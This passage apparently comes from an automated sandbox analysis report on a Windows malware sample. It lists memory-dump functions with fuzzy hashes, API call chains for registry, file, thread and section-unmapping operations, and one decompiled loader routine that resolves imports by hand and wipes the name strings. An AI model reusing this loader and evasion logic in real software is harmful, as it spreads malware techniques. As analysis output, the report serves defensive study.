  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
